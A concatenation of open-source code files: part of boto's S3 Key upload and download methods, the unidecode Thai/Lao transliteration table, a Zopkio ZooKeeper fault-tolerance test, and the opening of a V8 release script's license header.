:type fp: file
:param fp: the file whose contents to upload
:type headers: dict
:param headers: Additional HTTP headers that will be sent with
the PUT request.
:type replace: bool
:param replace: If this parameter is False, the method will
first check to see if an object exists in the bucket with
the same key. If it does, it won't overwrite it. The
default value is True which will overwrite the object.
:type cb: function
:param cb: a callback function that will be called to report
progress on the upload. The callback should accept two
integer parameters, the first representing the number of
bytes that have been successfully transmitted to S3 and
the second representing the size of the to be transmitted
object.
:type num_cb: int
:param num_cb: (optional) If a callback is specified with the
cb parameter this parameter determines the granularity of
the callback by defining the maximum number of times the
callback will be called during the file transfer.
:type policy: :class:`boto.s3.acl.CannedACLStrings`
:param policy: A canned ACL policy that will be applied to the
new key in S3.
:type md5: A tuple containing the hexdigest version of the MD5
checksum of the file as the first element and the
Base64-encoded version of the plain checksum as the second
element. This is the same format returned by the
compute_md5 method.
:param md5: If you need to compute the MD5 for any reason
prior to upload, it's silly to have to do it twice so this
param, if present, will be used as the MD5 values of the
file. Otherwise, the checksum will be computed.
:type reduced_redundancy: bool
:param reduced_redundancy: If True, this will set the storage
class of the new Key to be REDUCED_REDUNDANCY. The Reduced
Redundancy Storage (RRS) feature of S3, provides lower
redundancy at lower storage cost.
:type encrypt_key: bool
:param encrypt_key: If True, the new copy of the object will
be encrypted on the server-side by S3 and will be stored
in an encrypted form while at rest in S3.
:type size: int
:param size: (optional) The Maximum number of bytes to read
from the file pointer (fp). This is useful when uploading
a file in multiple parts where you are splitting the file
up into different ranges to be uploaded. If not specified,
the default behaviour is to read all bytes from the file
pointer. Fewer bytes may be available.
:type rewind: bool
:param rewind: (optional) If True, the file pointer (fp) will
be rewound to the start before any bytes are read from
it. The default behaviour is False which reads from the
current position of the file pointer (fp).
:rtype: int
:return: The number of bytes written to the key.
"""
provider = self.bucket.connection.provider
headers = headers or {}
if policy:
headers[provider.acl_header] = policy
if encrypt_key:
headers[provider.server_side_encryption_header] = 'AES256'
if rewind:
# caller requests reading from beginning of fp.
fp.seek(0, os.SEEK_SET)
else:
# The following seek/tell/seek logic is intended
# to detect applications using the older interface to
# set_contents_from_file(), which automatically rewound the
# file each time the Key was reused. This changed with commit
# 14ee2d03f4665fe20d19a85286f78d39d924237e, to support uploads
# split into multiple parts and uploaded in parallel, and at
# the time of that commit this check was added because otherwise
# older programs would get a success status and upload an empty
# object. Unfortunately, it's very inefficient for fp's implemented
# by KeyFile (used, for example, by gsutil when copying between
# providers). So, we skip the check for the KeyFile case.
# TODO: At some point consider removing this seek/tell/seek
# logic, after enough time has passed that it's unlikely any
# programs remain that assume the older auto-rewind interface.
if not isinstance(fp, KeyFile):
spos = fp.tell()
fp.seek(0, os.SEEK_END)
if fp.tell() == spos:
fp.seek(0, os.SEEK_SET)
if fp.tell() != spos:
# Raise an exception as this is likely a programming
# error whereby there is data before the fp but nothing
# after it.
fp.seek(spos)
raise AttributeError('fp is at EOF. Use rewind option '
'or seek() to data start.')
# seek back to the correct position.
fp.seek(spos)
if reduced_redundancy:
self.storage_class = 'REDUCED_REDUNDANCY'
if provider.storage_class_header:
headers[provider.storage_class_header] = self.storage_class
            # TODO - What if provider doesn't support reduced redundancy?
# What if different providers provide different classes?
if hasattr(fp, 'name'):
self.path = fp.name
if self.bucket is not None:
if not md5 and provider.supports_chunked_transfer():
                # Defer md5 calculation to be done on the fly during the
                # upload; we don't know anything about the size yet.
chunked_transfer = True
self.size = None
else:
chunked_transfer = False
if isinstance(fp, KeyFile):
# Avoid EOF seek for KeyFile case as it's very inefficient.
key = fp.getkey()
size = key.size - fp.tell()
self.size = size
# At present both GCS and S3 use MD5 for the etag for
# non-multipart-uploaded objects. If the etag is 32 hex
# chars use it as an MD5, to avoid having to read the file
# twice while transferring.
if (re.match('^"[a-fA-F0-9]{32}"$', key.etag)):
etag = key.etag.strip('"')
md5 = (etag, base64.b64encode(binascii.unhexlify(etag)))
if not md5:
                    # compute_md5() also sets self.size to the actual
                    # number of bytes read while computing the md5.
md5 = self.compute_md5(fp, size)
# adjust size if required
size = self.size
elif size:
self.size = size
else:
                # If md5 is provided, we still need the size, so
                # calculate it based on the bytes to the end of content.
spos = fp.tell()
fp.seek(0, os.SEEK_END)
self.size = fp.tell() - spos
fp.seek(spos)
size = self.size
self.md5 = md5[0]
self.base64md5 = md5[1]
if self.name is None:
self.name = self.md5
if not replace:
if self.bucket.lookup(self.name):
return
self.send_file(fp, headers=headers, cb=cb, num_cb=num_cb,
query_args=query_args,
chunked_transfer=chunked_transfer, size=size)
# return number of bytes written.
return self.size
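    # Usage sketch (an illustration, not part of the original module; assumes
    # an existing boto connection `conn` and a bucket named 'my-bucket'):
    #
    #   bucket = conn.get_bucket('my-bucket')
    #   key = bucket.new_key('logs/app.log')
    #   with open('app.log', 'rb') as fp:
    #       n = key.set_contents_from_file(fp, rewind=True)
    #   # n == number of bytes written to the key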
def set_contents_from_filename(self, filename, headers=None, replace=True,
cb=None, num_cb=10, policy=None, md5=None,
reduced_redundancy=False,
encrypt_key=False):
"""
Store an object in S3 using the name of the Key object as the
key in S3 and the contents of the file named by 'filename'.
See set_contents_from_file method for details about the
parameters.
:type filename: string
:param filename: The name of the file that you want to put onto S3
:type headers: dict
:param headers: Additional headers to pass along with the
request to AWS.
:type replace: bool
:param replace: If True, replaces the contents of the file
if it already exists.
:type cb: function
:param cb: a callback function that will be called to report
progress on the upload. The callback should accept two
integer parameters, the first representing the number of
bytes that have been successfully transmitted to S3 and
            the second representing the total size of the object
            being transmitted.
        :type num_cb: int
:param num_cb: (optional) If a callback is specified with the
cb parameter this parameter determines the granularity of
the callback by defining the maximum number of times the
callback will be called during the file transfer.
:type policy: :class:`boto.s3.acl.CannedACLStrings`
:param policy: A canned ACL policy that will be applied to the
new key in S3.
:type md5: A tuple containing the hexdigest version of the MD5
checksum of the file as the first element and the
Base64-encoded version of the plain checksum as the second
element. This is the same format returned by the
compute_md5 method.
:param md5: If you need to compute the MD5 for any reason
prior to upload, it's silly to have to do it twice so this
param, if present, will be used as the MD5 values of the
file. Otherwise, the checksum will be computed.
:type reduced_redundancy: bool
:param reduced_redundancy: If True, this will set the storage
class of the new Key to be REDUCED_REDUNDANCY. The Reduced
            Redundancy Storage (RRS) feature of S3 provides lower
            redundancy at lower storage cost.
        :type encrypt_key: bool
:param encrypt_key: If True, the new copy of the object
will be encrypted on the server-side by S3 and will be
stored in an encrypted form while at rest in S3.
:rtype: int
:return: The number of bytes written to the key.
"""
with open(filename, 'rb') as fp:
return self.set_contents_from_file(fp, headers, replace, cb,
num_cb, policy, md5,
reduced_redundancy,
encrypt_key=encrypt_key)
def set_contents_from_string(self, string_data, headers=None, replace=True,
cb=None, num_cb=10, policy=None, md5=None,
reduced_redundancy=False,
encrypt_key=False):
"""
Store an object in S3 using the name of the Key object as the
        key in S3 and the string 'string_data' as the contents.
See set_contents_from_file method for details about the
parameters.
:type headers: dict
:param headers: Additional headers to pass along with the
request to AWS.
:type replace: bool
:param replace: If True, replaces the contents of the file if
it already exists.
:type cb: function
:param cb: a callback function that will be called to report
progress on the upload. The callback should accept two
integer parameters, the first representing the number of
bytes that have been successfully transmitted to S3 and
            the second representing the total size of the object
            being transmitted.
        :type num_cb: int
:param num_cb: (optional) If a callback is specified with the
cb parameter this parameter determines the granularity of
the callback by defining the maximum number of times the
callback will be called during the file transfer.
:type policy: :class:`boto.s3.acl.CannedACLStrings`
:param policy: A canned ACL policy that will be applied to the
new key in S3.
:type md5: A tuple containing the hexdigest version of the MD5
checksum of the file as the first element and the
Base64-encoded version of the plain checksum as the second
element. This is the same format returned by the
compute_md5 method.
:param md5: If you need to compute the MD5 for any reason
prior to upload, it's silly to have to do it twice so this
param, if present, will be used as the MD5 values of the
file. Otherwise, the checksum will be computed.
:type reduced_redundancy: bool
:param reduced_redundancy: If True, this will set the storage
class of the new Key to be REDUCED_REDUNDANCY. The Reduced
            Redundancy Storage (RRS) feature of S3 provides lower
redundancy at lower storage cost.
:type encrypt_key: bool
:param encrypt_key: If True, the new copy of the object will
be encrypted on the server-side by S3 and will be stored
in an encrypted form while at rest in S3.
"""
if not isinstance(string_data, bytes):
string_data = string_data.encode("utf-8")
fp = BytesIO(string_data)
r = self.set_contents_from_file(fp, headers, replace, cb, num_cb,
policy, md5, reduced_redundancy,
encrypt_key=encrypt_key)
fp.close()
return r
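    # Usage sketch (an illustration, not part of the original module): the
    # string is wrapped in a BytesIO and routed through
    # set_contents_from_file, so all of its keyword arguments apply here too.
    #
    #   key.set_contents_from_string(
    #       u'{"ok": true}',
    #       headers={'Content-Type': 'application/json'})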
def get_file(self, fp, headers=None, cb=None, num_cb=10,
torrent=False, version_id=None, override_num_retries=None,
response_headers=None):
"""
Retrieves a file from an S3 Key
:type fp: file
:param fp: File pointer to put the data into
        :type headers: dict
        :param headers: headers to send when retrieving the file
:type cb: function
        :param cb: a callback function that will be called to report
            progress on the download. The callback should accept two
            integer parameters, the first representing the number of
            bytes that have been successfully received from S3 and
            the second representing the total size of the object.
        :type num_cb: int
:param num_cb: (optional) If a callback is specified with the
cb parameter this parameter determines the granularity of
the callback by defining the maximum number of times the
callback will be called during the file transfer.
:type torrent: bool
:param torrent: Flag for whether to get a torrent for the file
:type override_num_retries: int
:param override_num_retries: If not None will override configured
num_retries parameter for underlying GET.
:type response_headers: dict
:param response_headers: A dictionary containing HTTP
headers/values that will override any headers associated
with the stored object in the response. See
http://goo.gl/EWOPb for details.
:type version_id: str
:param version_id: The ID of a particular version of the object.
If this parameter is not supplied but the Key object has
a ``version_id`` attribute, that value will be used when
retrieving the object. You can set the Key object's
``version_id`` attribute to None to always grab the latest
version from a version-enabled bucket.
"""
self._get_file_internal(fp, headers=headers, cb=cb, num_cb=num_cb,
torrent=torrent, version_id=version_id,
override_num_retries=override_num_retries,
response_headers=response_headers,
hash_algs=None,
query_args=None)
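    # Usage sketch (an illustration, not part of the original module):
    # stream a stored object into a local file handle with progress reports.
    #
    #   def progress(transmitted, total):
    #       print('%d of %s bytes' % (transmitted, total))
    #
    #   with open('download.bin', 'wb') as fp:
    #       key.get_file(fp, cb=progress)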
def _get_file_internal(self, fp, headers=None, cb=None, num_cb=10,
torrent=False, version_id=None, override_num_retries=None,
response_headers=None, hash_algs=None, query_args=None):
if headers is None:
headers = {}
save_debug = self.bucket.connection.debug
if self.bucket.connection.debug == 1:
self.bucket.connection.debug = 0
query_args = query_args or []
if torrent:
query_args.append('torrent')
if hash_algs is None and not torrent:
hash_algs = {'md5': md5}
digesters = dict((alg, hash_algs[alg]()) for alg in hash_algs or {})
# If a version_id is passed in, use that. If not, check to see
# if the Key object has an explicit version_id and, if so, use that.
# Otherwise, don't pass a version_id query param.
if version_id is None:
version_id = self.version_id
if version_id:
query_args.append('versionId=%s' % version_id)
if response_headers:
for key in response_headers:
query_args.append('%s=%s' % (
key, urllib.parse.quote(response_headers[key])))
query_args = '&'.join(query_args)
self.open('r', headers, query_args=query_args,
override_num_retries=override_num_retries)
data_len = 0
if cb:
if self.size is None:
cb_size = 0
else:
cb_size = self.size
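            # Note on cb_count semantics (explanatory comment, added for
            # clarity): unknown size -> call cb roughly once per MB read;
            # num_cb > 1 -> spread the calls evenly across the transfer;
            # num_cb < 0 -> call cb for every buffer read; otherwise only
            # at the start and end of the transfer.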
if self.size is None and num_cb != -1:
# If size is not available due to chunked transfer for example,
# we'll call the cb for every 1MB of data transferred.
cb_count = (1024 * 1024) / self.BufferSize
elif num_cb > 1:
cb_count = int(math.ceil(cb_size/self.BufferSize/(num_cb-1.0)))
elif num_cb < 0:
cb_count = -1
else:
cb_count = 0
i = 0
cb(data_len, cb_size)
try:
for bytes in self:
fp.write(bytes)
data_len += len(bytes)
for alg in digesters:
digesters[alg].update(bytes)
if cb:
if cb_size > 0 and data_len >= cb_size:
break
i += 1
if i == cb_count or cb_count == -1:
cb(data_len, cb_size)
i = 0
except IOError as e:
if e.errno == errno.ENOSPC:
raise StorageDataError('Out of space for destination file '
'%s' % fp.name)
raise
if cb and (cb_count <= 1 or i > 0) and data_len > 0:
cb(data_len, cb_size)
for alg in digesters:
self.local_hashes[alg] = digesters[alg].digest()
if self.size is None and not torrent and "Range" not in headers:
self.size = data_len
self.close()
self.bucket.connection.debug = save_debug
def get_torrent_file(self, fp, headers=None, cb=None, num_cb=10):
"""
        Get a torrent file (see also get_file)
:type fp: file
:param fp: The file pointer of where to put the torrent
:type headers: dict
:param headers: Headers to be passed
:type cb: function
        :param cb: a callback function that will be called to report
            progress on the download. The callback should accept two
            integer parameters, the first representing the number of
            bytes that have been successfully received from S3 and
            the second representing the total size of the object.
        :type num_cb: int
:param num_cb: (optional) If a callback is specified with the
cb parameter this parameter determines the granularity of
the callback by defining the maximum number of times the
callback will be called during the file transfer.
"""
return self.get_file(fp, headers, cb, num_cb, torrent=True)
def get_contents_to_file(self, fp, headers=None,
cb=None, num_cb=10,
torrent=False,
version_id=None,
res_download_handler=None,
response_headers=None):
"""
Retrieve an object from S3 using the name of the Key object as the
key in S3. Write the contents of the object to the file pointed
to by 'fp'.
        :type fp: file-like object
        :param fp: the file-like object to write the object's contents to
:type headers: dict
:param headers: additional HTTP headers that will be sent with
the GET request.
:type cb: function
        :param cb: a callback function that will be called to report
            progress on the download. The callback should accept two
            integer parameters, the first representing the number of
            bytes that have been successfully received from S3 and
            the second representing the total size of the object.
        :type num_cb: int
:param num_cb: (optional) If a callback is specified with the
cb parameter this parameter determines the granularity of
the callback by defining the maximum number of times the
callback will be called during the file transfer.
:type torrent: bool
:param torrent: If True, returns the contents of a torrent
file as a string.
        :type res_download_handler: ResumableDownloadHandler
:param res_download_handler: If provided, this handler will
perform the download.
:type response_headers: dict
:param response_headers: A dictionary containing HTTP
headers/values that will override any headers associated
with the stored object in the response. See
http://goo.gl/EWOPb for details.
:type version_id: str
:param version_id: The ID of a particular version of the object.
If this parameter is not supplied but the Key object has
a ``version_id`` attribute, that value will be used when
retrieving the object. You can set the Key object's
``version_id`` attribute to None to always grab the latest
version from a version-enabled bucket.
"""
if self.bucket is not None:
if res_download_handler:
res_download_handler.get_file(self, fp, headers, cb, num_cb,
torrent=torrent,
version_id=version_id)
else:
self.get_file(fp, headers, cb, num_cb, torrent=torrent,
version_id=version_id,
response_headers=response_headers)
def get_contents_to_filename(self, filename, headers=None,
cb=None, num_cb=10,
torrent=False,
version_id=None,
res_download_handler=None,
response_headers=None):
"""
Retrieve an object from S3 using the name of the Key object as the
key in S3. Store contents of the object to a file named by 'filename'.
See get_contents_to_file method for details about the
parameters.
:type filename: string
:param filename: The filename of where to put the file contents
:type headers: dict
:param headers: Any additional headers to send in the request
:type cb: function
        :param cb: a callback function that will be called to report
            progress on the download. The callback should accept two
            integer parameters, the first representing the number of
            bytes that have been successfully received from S3 and
            the second representing the total size of the object.
:type num_cb: int
:param num_cb: (optional) If a callback is specified with the
cb parameter this parameter determines the granularity of
the callback by defining the maximum number of times the
callback will be called during the file transfer.
:type torrent: bool
:param torrent: If True, returns the contents of a torrent file
as a string.
        :type res_download_handler: ResumableDownloadHandler
:param res_download_handler: If provided, this handler will
perform the download.
:type response_headers: dict
:param response_headers: A dictionary containing HTTP
headers/values that will override any headers associated
with the stored object in the response. See
http://goo.gl/EWOPb for details.
:type version_id: str
:param version_id: The ID of a particular version of the object.
If this parameter is not supplied but the Key object has
a ``version_id`` attribute, that value will be used when
retrieving the object. You can set the Key object's
``version_id`` attribute to None to always grab the latest
version from a version-enabled bucket.
"""
try:
with open(filename, 'wb') as fp:
self.get_contents_to_file(fp, headers, cb, num_cb,
torrent=torrent,
version_id=version_id,
res_download_handler=res_download_handler,
response_headers=response_headers)
except Exception:
os.remove(filename)
raise
# if last_modified date was sent from s3, try to set file's timestamp
if self.last_modified is not None:
try:
modified_tuple = email.utils.parsedate_tz(self.last_modified)
modified_stamp = int(email.utils.mktime_tz(modified_tuple))
os.utime(fp.name, (modified_stamp, modified_stamp))
except Exception:
pass
def get_contents_as_string(self, headers=None,
cb=None, num_cb=10,
torrent=False,
version_id=None,
response_headers=None, encoding=None):
"""
Retrieve an object from S3 using the name of the Key object as the
key in S3. Return the contents of the object as a string.
See get_contents_to_file method for details about the
parameters.
:type headers: dict
:param headers: Any additional headers to send in the request
:type cb: function
        :param cb: a callback function that will be called to report
            progress on the download. The callback should accept two
            integer parameters, the first representing the number of
            bytes that have been successfully received from S3 and
            the second representing the total size of the object.
        :type num_cb: int
:param num_cb: (optional) If a callback is specified with the
cb parameter this parameter determines the granularity of
the callback by defining the maximum number of times the
callback will be called during the file transfer.
:type torrent: bool
:param torrent: If True, returns the contents of a torrent file
as a string.
:type response_headers: dict
:param response_headers: A dictionary containing HTTP
headers/values that will override any headers associated
with the stored object in the response. See
http://goo.gl/EWOPb for details.
:type version_id: str
:param version_id: The ID of a particular version of the object.
If this parameter is not supplied but the Key object has
a ``version_id`` attribute, that value will be used when
retrieving the object. You can set the Key object's
``version_id`` attribute to None to always grab the latest
version from a version-enabled bucket.
:type encoding: str
:param encoding: The text encoding to use, such as ``utf-8``
or ``iso-8859-1``. If set, then a string will be returned.
Defaults to ``None`` and returns bytes.
:rtype: bytes or str
:returns: The contents of the file as bytes or a string
"""
fp = BytesIO()
self.get_contents_to_file(fp, headers, cb, num_cb, torrent=torrent,
version_id=version_id,
response_headers=response_headers)
value = fp.getvalue()
if encoding is not None:
value = value.decode(encoding)
return value
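    # Usage sketch (an illustration, not part of the original module):
    #
    #   raw = key.get_contents_as_string()                    # bytes
    #   text = key.get_contents_as_string(encoding='utf-8')   # str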
def add_email_grant(self, permission, email_address, headers=None):
"""
Convenience method that provides a quick way to add an email grant
to a key. This method retrieves the current ACL, creates a new
grant based on the parameters passed in, adds that grant to the ACL
and then PUT's the new ACL back to S3.
:type permission: string
:param permission: The permission being granted. Should be one of:
(READ, WRITE, READ_ACP, WRITE_ACP, FULL_CONTROL).
:type email_address: string
:param email_address: The email address associated with the AWS
            account you are granting the permission to.
"""
policy = self.get_acl(headers=headers)
policy.acl.add_email_grant(permission, email_address)
self.set_acl(policy, headers=headers)
def add_user_grant(self, permission, user_id, headers=None,
display_name=None):
"""
Convenience method that provides a quick way to add a canonical
user grant to a key. This method retrieves the current ACL,
creates a new grant based on the parameters passed in, adds that
grant to the ACL and then PUT's the new ACL back to S3.
:type permission: string
:param permission: The permission being granted. Should be one of:
(READ, WRITE, READ_ACP, WRITE_ACP, FULL_CONTROL).
:type user_id: string
:param user_id: The canonical user id associated with the AWS
            account you are granting the permission to.
:type display_name: string
        :param display_name: An optional string containing the user's
Display Name. Only required on Walrus.
"""
policy = self.get_acl(headers=headers)
policy.acl.add_user_grant(permission, user_id,
display_name=display_name)
self.set_acl(policy, headers=headers)
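    # Usage sketch (an illustration, not part of the original module; the
    # grantee values are placeholders): both helpers do a read-modify-write
    # of the key's ACL, so concurrent ACL updates can race.
    #
    #   key.add_email_grant('READ', 'user@example.com')
    #   key.add_user_grant('FULL_CONTROL', '<64-hex-char-canonical-user-id>')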
def _normalize_metadata(self, metadata):
        if isinstance(metadata, set):
norm_metadata = set()
for k in metadata:
norm_metadata.add(k.lower())
else:
norm_metadata = {}
for k in metadata:
norm_metadata[k.lower()] = metadata[k]
return norm_metadata
def _get_remote_metadata(self, headers=None):
"""
Extracts metadata from existing URI into a dict, so we can
overwrite/delete from it to form the new set of metadata to apply to a
key.
"""
metadata = {}
for underscore_name in self._underscore_base_user_settable_fields:
if hasattr(self, underscore_name):
value = getattr(self, underscore_name)
if value:
# Generate HTTP field name corresponding to "_" named field.
field_name = underscore_name.replace('_', '-')
metadata[field_name.lower()] = value
# self.metadata contains custom metadata, which are all user-settable.
prefix = self.provider.metadata_prefix
for underscore_name in self.metadata:
field_name = underscore_name.replace('_', '-')
metadata['%s%s' % (prefix, field_name.lower())] = (
self.metadata[underscore_name])
return metadata
def set_remote_metadata(self, metadata_plus, metadata_minus, preserve_acl,
headers=None):
metadata_plus = self._normalize_metadata(metadata_plus)
metadata_minus = self._normalize_metadata(metadata_minus)
metadata = self._get_remote_metadata()
metadata.update(metadata_plus)
for h in metadata_minus:
if h in metadata:
del metadata[h]
src_bucket = self.bucket
# Boto prepends the meta prefix when adding headers, so strip prefix in
# metadata before sending back in to copy_key() call.
rewritten_metadata = {}
for h in metadata:
if (h.startswith('x-goog-meta-') or h.startswith('x-amz-meta-')):
rewritten_h = (h.replace('x-goog-meta-', '')
.replace('x-amz-meta-', ''))
else:
rewritten_h = h
rewritten_metadata[rewritten_h] = metadata[h]
metadata = rewritten_metadata
src_bucket.copy_key(self.name, self.bucket.name, self.name,
metadata=metadata, preserve_acl=preserve_acl,
headers=headers)
def restore(self, days, headers=None):
"""Restore an object from an archive.
:type days: int
:param days: The lifetime of the restored object (must
be at least 1 day). If the object is already restored
then this parameter can be used to readjust the lifetime
of the restored object. In this case, the days
param is with respect to the initial time of the request.
If the object has not been restored, this param is with
respect to the completion time of the request.
"""
response = self.bucket.connection.make_request(
'POST', self.bucket.name, self.name,
data=self.RestoreBody % days,
headers=headers, query_args='restore')
if response.status not in (200, 202):
provider = self.bucket.connection.provider
raise provider.storage_response_error(response.status,
response.reason,
response.read())
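    # Usage sketch (an illustration, not part of the original module): ask
    # the service to restore an archived object for two days. A 200/202
    # response only means the restore was accepted, not that it is complete.
    #
    #   key.restore(days=2)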
| mit |
menardorama/ReadyNAS-Add-ons | headphones-1.0.0/files/etc/apps/headphones/lib/unidecode/x00e.py | 252 | 4092 | data = (
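# Transliteration table for Unicode code points U+0E00-U+0EFF (the Thai and
# Lao blocks): entry N is the ASCII replacement for code point 0x0E00 + N,
# and '[?]' marks characters with no transliteration.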
'[?]', # 0x00
'k', # 0x01
'kh', # 0x02
'kh', # 0x03
'kh', # 0x04
'kh', # 0x05
'kh', # 0x06
'ng', # 0x07
'cch', # 0x08
'ch', # 0x09
'ch', # 0x0a
'ch', # 0x0b
'ch', # 0x0c
'y', # 0x0d
'd', # 0x0e
't', # 0x0f
'th', # 0x10
'th', # 0x11
'th', # 0x12
'n', # 0x13
'd', # 0x14
't', # 0x15
'th', # 0x16
'th', # 0x17
'th', # 0x18
'n', # 0x19
'b', # 0x1a
'p', # 0x1b
'ph', # 0x1c
'f', # 0x1d
'ph', # 0x1e
'f', # 0x1f
'ph', # 0x20
'm', # 0x21
'y', # 0x22
'r', # 0x23
'R', # 0x24
'l', # 0x25
'L', # 0x26
'w', # 0x27
's', # 0x28
's', # 0x29
's', # 0x2a
'h', # 0x2b
'l', # 0x2c
'`', # 0x2d
'h', # 0x2e
'~', # 0x2f
'a', # 0x30
'a', # 0x31
'aa', # 0x32
'am', # 0x33
'i', # 0x34
'ii', # 0x35
'ue', # 0x36
'uue', # 0x37
'u', # 0x38
'uu', # 0x39
'\'', # 0x3a
'[?]', # 0x3b
'[?]', # 0x3c
'[?]', # 0x3d
'[?]', # 0x3e
'Bh.', # 0x3f
'e', # 0x40
'ae', # 0x41
'o', # 0x42
'ai', # 0x43
'ai', # 0x44
'ao', # 0x45
'+', # 0x46
'', # 0x47
'', # 0x48
'', # 0x49
'', # 0x4a
'', # 0x4b
'', # 0x4c
'M', # 0x4d
'', # 0x4e
' * ', # 0x4f
'0', # 0x50
'1', # 0x51
'2', # 0x52
'3', # 0x53
'4', # 0x54
'5', # 0x55
'6', # 0x56
'7', # 0x57
'8', # 0x58
'9', # 0x59
' // ', # 0x5a
' /// ', # 0x5b
'[?]', # 0x5c
'[?]', # 0x5d
'[?]', # 0x5e
'[?]', # 0x5f
'[?]', # 0x60
'[?]', # 0x61
'[?]', # 0x62
'[?]', # 0x63
'[?]', # 0x64
'[?]', # 0x65
'[?]', # 0x66
'[?]', # 0x67
'[?]', # 0x68
'[?]', # 0x69
'[?]', # 0x6a
'[?]', # 0x6b
'[?]', # 0x6c
'[?]', # 0x6d
'[?]', # 0x6e
'[?]', # 0x6f
'[?]', # 0x70
'[?]', # 0x71
'[?]', # 0x72
'[?]', # 0x73
'[?]', # 0x74
'[?]', # 0x75
'[?]', # 0x76
'[?]', # 0x77
'[?]', # 0x78
'[?]', # 0x79
'[?]', # 0x7a
'[?]', # 0x7b
'[?]', # 0x7c
'[?]', # 0x7d
'[?]', # 0x7e
'[?]', # 0x7f
'[?]', # 0x80
'k', # 0x81
'kh', # 0x82
'[?]', # 0x83
'kh', # 0x84
'[?]', # 0x85
'[?]', # 0x86
'ng', # 0x87
'ch', # 0x88
'[?]', # 0x89
's', # 0x8a
'[?]', # 0x8b
'[?]', # 0x8c
'ny', # 0x8d
'[?]', # 0x8e
'[?]', # 0x8f
'[?]', # 0x90
'[?]', # 0x91
'[?]', # 0x92
'[?]', # 0x93
'd', # 0x94
'h', # 0x95
'th', # 0x96
'th', # 0x97
'[?]', # 0x98
'n', # 0x99
'b', # 0x9a
'p', # 0x9b
'ph', # 0x9c
'f', # 0x9d
'ph', # 0x9e
'f', # 0x9f
'[?]', # 0xa0
'm', # 0xa1
'y', # 0xa2
'r', # 0xa3
'[?]', # 0xa4
'l', # 0xa5
'[?]', # 0xa6
'w', # 0xa7
'[?]', # 0xa8
'[?]', # 0xa9
's', # 0xaa
'h', # 0xab
'[?]', # 0xac
'`', # 0xad
'', # 0xae
'~', # 0xaf
'a', # 0xb0
'', # 0xb1
'aa', # 0xb2
'am', # 0xb3
'i', # 0xb4
'ii', # 0xb5
'y', # 0xb6
'yy', # 0xb7
'u', # 0xb8
'uu', # 0xb9
'[?]', # 0xba
'o', # 0xbb
'l', # 0xbc
'ny', # 0xbd
'[?]', # 0xbe
'[?]', # 0xbf
'e', # 0xc0
'ei', # 0xc1
'o', # 0xc2
'ay', # 0xc3
'ai', # 0xc4
'[?]', # 0xc5
'+', # 0xc6
'[?]', # 0xc7
'', # 0xc8
'', # 0xc9
'', # 0xca
'', # 0xcb
'', # 0xcc
'M', # 0xcd
'[?]', # 0xce
'[?]', # 0xcf
'0', # 0xd0
'1', # 0xd1
'2', # 0xd2
'3', # 0xd3
'4', # 0xd4
'5', # 0xd5
'6', # 0xd6
'7', # 0xd7
'8', # 0xd8
'9', # 0xd9
'[?]', # 0xda
'[?]', # 0xdb
'hn', # 0xdc
'hm', # 0xdd
'[?]', # 0xde
'[?]', # 0xdf
'[?]', # 0xe0
'[?]', # 0xe1
'[?]', # 0xe2
'[?]', # 0xe3
'[?]', # 0xe4
'[?]', # 0xe5
'[?]', # 0xe6
'[?]', # 0xe7
'[?]', # 0xe8
'[?]', # 0xe9
'[?]', # 0xea
'[?]', # 0xeb
'[?]', # 0xec
'[?]', # 0xed
'[?]', # 0xee
'[?]', # 0xef
'[?]', # 0xf0
'[?]', # 0xf1
'[?]', # 0xf2
'[?]', # 0xf3
'[?]', # 0xf4
'[?]', # 0xf5
'[?]', # 0xf6
'[?]', # 0xf7
'[?]', # 0xf8
'[?]', # 0xf9
'[?]', # 0xfa
'[?]', # 0xfb
'[?]', # 0xfc
'[?]', # 0xfd
'[?]', # 0xfe
)
| gpl-2.0 |
pubnub/Zopkio | examples/zookeeper/test_suites/zookeeper_test_faulttolerance.py | 4 | 1959 | # Copyright 2015 LinkedIn Corp.
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
from kazoo.client import KazooClient
from multiprocessing import Process
import time
import zopkio.runtime as runtime
import zopkio.test_utils as testutilities
import zopkio.adhoc_deployer as adhoc_deployer
zookeper_deployer = None
test_phase = 2
def test_zookeeper_fault_tolerance():
"""
Kill zookeeper1 and see if other zookeeper instances are in quorum
"""
zookeper_deployer = runtime.get_deployer("zookeeper")
kazoo_connection_url = str(runtime.get_active_config('zookeeper_host') + ':2181')
zkclient = KazooClient(hosts=kazoo_connection_url)
zkclient.start()
zkclient.ensure_path("/my/zookeeper_errorinjection")
# kill the Zookeeper1 instance
print "killing zoookeeper instance1"
zookeper_deployer.kill("zookeeper1")
time.sleep(20)
zkclient.stop()
def validate_zookeeper_fault_tolerance():
"""
Validate that we can still connect to zookeeper instance 2 to read the node
"""
zk2 = KazooClient(hosts=str(runtime.get_active_config('zookeeper_host') + ':2182'))
zk2.start()
assert zk2.exists("/my/zookeeper_errorinjection/"), "zookeeper_errorinjection node not found"
zk2.stop()
| apache-2.0 |
Champii/runtime | deps/v8/tools/release/common_includes.py | 21 | 29230 | #!/usr/bin/env python
# Copyright 2013 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
